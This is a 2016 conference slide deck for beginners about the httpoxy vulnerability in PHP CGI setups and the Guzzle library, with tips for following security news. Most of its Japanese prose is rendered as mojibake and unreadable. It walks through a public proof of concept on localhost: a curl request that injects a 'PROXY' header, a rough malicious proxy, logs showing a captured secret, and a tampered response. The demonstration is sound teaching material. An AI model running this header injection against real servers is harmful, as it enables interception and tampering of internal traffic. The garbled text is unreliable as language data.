初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

by uzulla

Slide 1

Slide 1 text

PHPBLT#5 Httpoxyͱ͔ͷ࿩ 20160720 uzulla

Slide 2

Slide 2 text

ࣗݾ঺հ • Junichi Ishida aka uzulla • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢ • HachiojiͳΜͨΒͱ͔ • ͳΜͨΒHacjioji in ඼઒ͱ͔

Slide 3

Slide 3 text

Httpoxy • https:/ /httpoxy.org/ • ࡉ޻ͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦΁ͷϦΫΤε τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ • ΞϓϦ͔Βଞͷαʔόʔ΁ͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ • ͋Δ͍͸ɺվ͟Μ΋Ͱ͖ΔՄೳੑ • ΈΜͳௐࠪࡁΈͩΑͶʂʁ • ʢΈΜͳ஌͍ͬͯͨΒ਺ϖʔδඈ͹͢ʣ

Slide 4

Slide 4 text

No content

Slide 5

Slide 5 text

• ʮCLIͰΑ͋͘Δ࢓༷ʯͱʮCGIͷ࢓༷ʯͷিಥ͕ݪҼ • HTTP_PROXY؀ڥม਺ͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ ͕Α͋͘Δ • ΢ΣϒΞϓϦʹ͸ʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣ͸PHPͰ CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ • ͯ͞ɺCGIͷ࢓༷Ͱ͸ʢྫ͑͹ʣHOGEͱ͍͏ϦΫΤετϔομ ʔΛHTTP_HOGE؀ڥม਺ʹอଘ͢Δͷ͕ͩ…ɻ • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏؀ڥม਺͕ ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ

Slide 6

Slide 6 text

• CGIϦεϖΫτͳPHP͸mod_php΍fastcgi΋͜ͷ࢓༷ • ͳ͓ɺPHPࣗମ͸௚઀͜ͷ੬ऑੑ͸Өڹ͠ͳ͍ • օେ޷͖ﬁle_get_contents͸Өڹͳ͍ • ͕Μ͹ͬͯ࡞Γ͜·ͳ͚Ε͹Өڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ • HTTP_PROXYΛड͚ೖΕΔ୅දతͳϥΠϒϥϦͱͯ͠guzzle • 6.2.1Ͱमਖ਼ • guzzle͸࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠࢖ΘΕ͍ͯ ΔɺͳͷͰ࿩୊ʹͳͬͨͷͰͨ͠ʂ

Slide 7

Slide 7 text

ͳ͓… • ઃఆͰ͖Δͷ͸HTTP_PROXY؀ڥม਺Ͱ͋ͬͯɺHTTPS_PROXY؀ ڥม਺͸ࢦఆͰ͖ͳ͍ • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ • ͭ·Γɺ৐ͬऔΕΔͷ͸HTTP • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ • େ఍ͷϠόΠ৘ใ͸HTTPSͩΖ͏…ଟ෼…ɻ

Slide 8

Slide 8 text

ΦνͱͳΔରࡦ͸ • !΢Σϒαʔό౳ͰɺPHPͷࣄલʹϔομʔΛམͱ͢ • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢ • ίʔυΛ௚͢ • ϥΠϒϥϦͷόʔδϣϯΞοϓ • ❌ʮίʔυઌ಄ͱ͔Ͱ؀ڥม਺্ॻ͖͢Ε͹͍͍ͷͰ͸ʁʯ ʮ࢒೦ͳΒແཧͳͷͰ͢ʯ

Slide 9

Slide 9 text

͜͜·Ͱ͸օ͞Μ͝ଘ͡ • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ • ʮࣗ෼Ͱʯௐࠪ΍ରԠͯ͠·͔͢ʁ • ʮࣗ෼Ͱʯීஈ͔Β৘ใऩूͯ͠·͔͢ʁ • ʢͳ͓ϑϦʔλʔ͸ݽಠͳͷͰ౰વηϧϑαʔϏε…ʣ

Slide 10

Slide 10 text

ࢼͯ͠·͔͢ʁ • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ • ੬ऑੑ͸ࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ • ௨ৗࣗ෼Ͱ࣮૷͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ ΋ଟ͍ • Proof of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ • ʢ࠷ۙࢮޠɿexploit codeʣ

Slide 11

Slide 11 text

ࢼͦ͏ʂ • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ

Slide 12

Slide 12 text

• PoC͸Ͳ͜ʹ͋Δ͔ʁ • CVE౳ʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱ͸ͳ͍ɺͷͰ୳͢ • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ΋͍ΔͷͰ… • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢ΍Exploitʣ͸ઈରʹ࣮ߦ͢Δͳʂʂʂ • CVEͱ͔ʹ৐ͬͯΔౕ͸େৎ෉ͩΖ͏͕ɺ໺ྑͷExploit͸ഁ յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ • ࠓճ͸httpoxy͕ެ։͍ͯͨ͠ • https:/ /github.com/httpoxy/php-fpm-httpoxy-poc

Slide 13

Slide 13 text

// ݩͷίʔυ͸͜ͷΑ͏ͳײ͡ // "guzzlehttp/guzzle": "~6.0" $client = new GuzzleHttp\Client(); $client->request( 'POST', 'http://my-internal-microservice.example.com/', ['secret' => 'some-really-secret-string'] ); echo "Request sent\n";

Slide 14

Slide 14 text

// ͦͷ··Ͱ͸࢖͑ͳ͍ͷͰɺίʔυमਖ਼ // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ require 'vendor/autoload.php'; $client = new GuzzleHttp\Client(); $res = $client->request( 'POST', 'http://127.0.0.1:8002/api.php?himi=tsu', ['form_params' => ['secret' => 'I_AM_PHPER']] ); echo $res->getBody();

Slide 15

Slide 15 text

API(?!)Λ࡞੒

Slide 16

Slide 16 text

ΞϓϦͱAPI(?!)Λىಈ $ composer install $ php -S 127.0.0.1:8001 index.php # ผγΣϧͰ $ php -S 127.0.0.1:8002 api.php

Slide 17

Slide 17 text

ͨΊͯ͠ΈΔ $ curl 'http://localhost:8001/' BLT!BLT! • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK

Slide 18

Slide 18 text

ѱҙ͋ΔProxyΛ༻ҙ͢Δ • ͝ՈఉʹProxy͕͋Δํ͸ෆཁ • Charlesͱ͔ • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙ͸ͳʹ͕ϋϠϦͳͷʁ)

Slide 19

Slide 19 text

ѱҙ()͋ΔࡶͳproxyΛॻ͘ request($method, $uri, ['body' => $body]); echo $res->getBody();

Slide 20

Slide 20 text

ࡶͳProxyʹ͍ͭͯ • ੒ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ • ద౰ʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ ʢproxy͔ͩΒͶ…ʣ • ͜ͷίʔυ͸ࡶͰةݥͳͷͰ࣮ݧҎ֎ʹ͸ઈରʹ࢖͏ͳΑʂ • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ

Slide 21

Slide 21 text

ࡶͳproxy্ཱͪ͛ $ php -S 127.0.0.1:8003 proxy.php

Slide 22

Slide 22 text

࣮ࡍʹ੬ऑੑΛςετͩʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!

Slide 23

Slide 23 text

• ʮ࢒೦͜ΕͰ͸͏͖͝·ͤΜʯ • ͳΜͱbuiltin server ͸੬ऑੑ͕ͳ͍ʂ͆ • ͱ͍͏͜ͱͰɺ੿࡞apachehereΛ͔ͭ͏(໪࿦ͳΜͰ΋͍͍͚Ͳ) • https:/ /github.com/uzulla/apachehere $ apachehere -p 8001 DocumentRoot : /xxx php-cgi open : http://127.0.0.1:8001/ [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php

Slide 24

Slide 24 text

ϦτϥΠʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!

Slide 25

Slide 25 text

੒ޭ͢Δͱproxyͷϩάʹ… [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43 2016] Array ( [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc [REMOTE_ADDR] => 127.0.0.1 [REMOTE_PORT] => 53696 [SERVER_SOFTWARE] => PHP 7.0.3 Development Server [SERVER_PROTOCOL] => HTTP/1.1 [SERVER_NAME] => 127.0.0.1 [SERVER_PORT] => 8003 [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu [REQUEST_METHOD] => POST [SCRIPT_NAME] => /api.php [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php [PHP_SELF] => /api.php [QUERY_STRING] => himi=tsu [HTTP_HOST] => 127.0.0.1:8002 [HTTP_PROXY_CONNECTION] => Keep-Alive [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3 [CONTENT_TYPE] => application/x-www-form-urlencoded [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded [CONTENT_LENGTH] => 17 [HTTP_CONTENT_LENGTH] => 17 [REQUEST_TIME_FLOAT] => 1468947703.6871 [REQUEST_TIME] => 1468947703 )

Slide 26

Slide 26 text

[Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43 2016] Array ( snip [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ

Slide 27

Slide 27 text

proxyΛमਖ਼͢Ε͹… // proxy.php //echo $res->getBody(); echo "ീԦࢠʂീԦࢠʂ"; • ͱमਖ਼ͯ͠ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' ീԦࢠʂീԦࢠʂ • վ͟Μ੒ޭͰ͢Ͷʂ

Slide 28

Slide 28 text

ͱ͍͏͜ͱͰɺ • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷ͸ॏཁɺษڧʹͳΔ • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ

Slide 29

Slide 29 text

͋ͱɺ৻ॏʹͶʂ • ύονόʔδϣϯΛ؁͘Έͯ͸͍͚ͳ͍ • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮࿩ʯ exception: php_sapi_name() has been disabled for security reasons. It can be re-enabled by adding it to the google_app_engine.enable_functions ini variable in your applications php.ini • ʮGAE ͕ѱ͍ ͷ࢓༷Ͱ͸ʁʯʮ͔ͨ͠ʹʯ

Slide 30

Slide 30 text

Ͱ͸υίͰ஌Δ͔ʁ • օ͞Μ͸Ͳ͜Ͱ஌ͬͯ·͔͢ʁ

Slide 31

Slide 31 text

໰୊Λ΢Υον͠ଓ͚Δ • ໘౗͕ͩ࢓ࣄͩʂ • TwitterͳͲSNSͰ஌Δ • CVEͳͲΛߪಡ͢Δ • χϡʔεαΠτΛߪಡ͢Δ • ެࣜϦϦʔεΛߪಡ͢Δ

Slide 32

Slide 32 text

TwitterͳͲSNS • ଎ใੑ͕ߴ͍ɺ5ׂ͘Β͍͸͜͜ͰଘࡏΛ஌ΔࣄʹͳΔ • ʢPHPͷਓͰ͸ͳ͆͘ʣJSɺGoɺPerl΍Πϯϑϥํ໘ͳͲͷਓΛ ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ • ৄ͍͠ਓ͸౰વ࿩୊ʹ͢Δ͜ͱ͕ଟ͍͠ɺ ʢΘ͔͍ͬͯΔͷͰʣҰ࣍৘ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍

Slide 33

Slide 33 text

ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ • http:/ /jvn.jp/report/ • JVNɺ೔ຊޠɺ·ͣ͸͚ͩ͜͜Ͱ΋ྑ͍ʢͱࢥ͏ʣ • Feed΋͋ΔΑ • https:/ /www.jpcert.or.jp/ • JPCERTɺϝϧϚΨ΋͋ΔΑʂ

Slide 34

Slide 34 text

• https:/ /nvd.nist.gov/download.cfm • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར • CVE͸΄΅Ұ࣍৘ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ • https:/ /security.sensiolabs.org/database • PHPϥΠϒϥϦͷ৘ใɺFeed͕͋ΔͷͰศར

Slide 35

Slide 35 text

ҰൠతͳχϡʔεαΠτ౳ • ҰൠతͳITܥχϡʔεαΠτ͸…ຊจ͸ಡ·ͣʹ͙͢ʹϦϯΫઌ ͷҰ࣍৘ใ΁ݴͬͨํ͕ྑ͍…ɻ

Slide 36

Slide 36 text

• reddit֤छɺ଎ใੑߴ͍͕ίϝϯτ͸͙͢ʹ৴༻͠ͳ͍Α͏ʹ • https:/ /www.reddit.com/r/netsec • https:/ /www.reddit.com/r/sysadmin • https:/ /www.reddit.com/r/PHP • hackernewsɺ଎͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘ • https:/ /news.ycombinator.com/news

Slide 37

Slide 37 text

ެࣜαΠτ • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ • ࣗ෼͕͔͍ͭͬͯΔϑϨʔϜϫʔΫ΍ϥΠϒϥϦ΍PHPͷϦϦ ʔεͱ͔͸Έͯ΋ྑ͍ͷͰ͸ʁʁ

Slide 38

Slide 38 text

blog • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔ • ηΩϡϦςΟاۀͷϒϩά΋Α͍ • ౰વ͚ͩͲɺ໢ཏੑ͕ͳ͍ • ʮ୯ޠʯΛ஌ͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰ΋Α͍ • झຯ͕ͰΔͷͰলུ

Slide 39

Slide 39 text

Branded Vulnerability ͳαΠτ • ࠷ۙ͸Ωϟονʔͳ໊લ͕෇͘ɺHttpoxy΋ͦ͏ • GHOST,FREAK,POODLE౳ʑ • ·ͱΊαΠτΈ͍ͨͳ΋ͷɺγΣΞ͠΍͘͢ΩϟονʔͳΞΠ ίϯ͕͋ͬͨΓͯ͠Α͍ • ଟ͘ͷ৔߹CVEΑΓ͸Θ͔Γ΍͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ Ͱ΋OK͕ͩɺӳޠͰ͢ɻ • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱ͸ͳ͍ɺٯ΋·͔ͨ͠Γ

Slide 40

Slide 40 text

৘ใΩϟον·ͱΊ • ΢Υονʹ͸RSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱ͸ͳ͍͆ʣ • JPCERTͱJVN͘Β͍͸ొ࿥ͯ͠Α͍ͷͰ͸ • Branded VulnerabilityͳαΠτ͕͋Ε͹·ͣνΣοΫ • ӳޠ͕ॏཁʢʣ • ࿨༁΍ղઆهࣄ͸Ұ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚ Ε͹߄ͯͣʹਖ਼࠲ͯ͠଴ͭ͜ͱ

Slide 41

Slide 41 text

That's all folks! • ੬ऑੑ͸ࣗ෼Ͱ΋ͨΊͦ͏ʂ • χϡʔεΛͪΌΜͱݟΑ͏ʂ • ͪΌΜͱ੬ऑੑΛ೺Ѳͯ͜͠ʂ • Httpoxyɺ͋Μ·Γ೿खͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ // enjoy ! $ grep -r HTTP_PROXY /your/codes/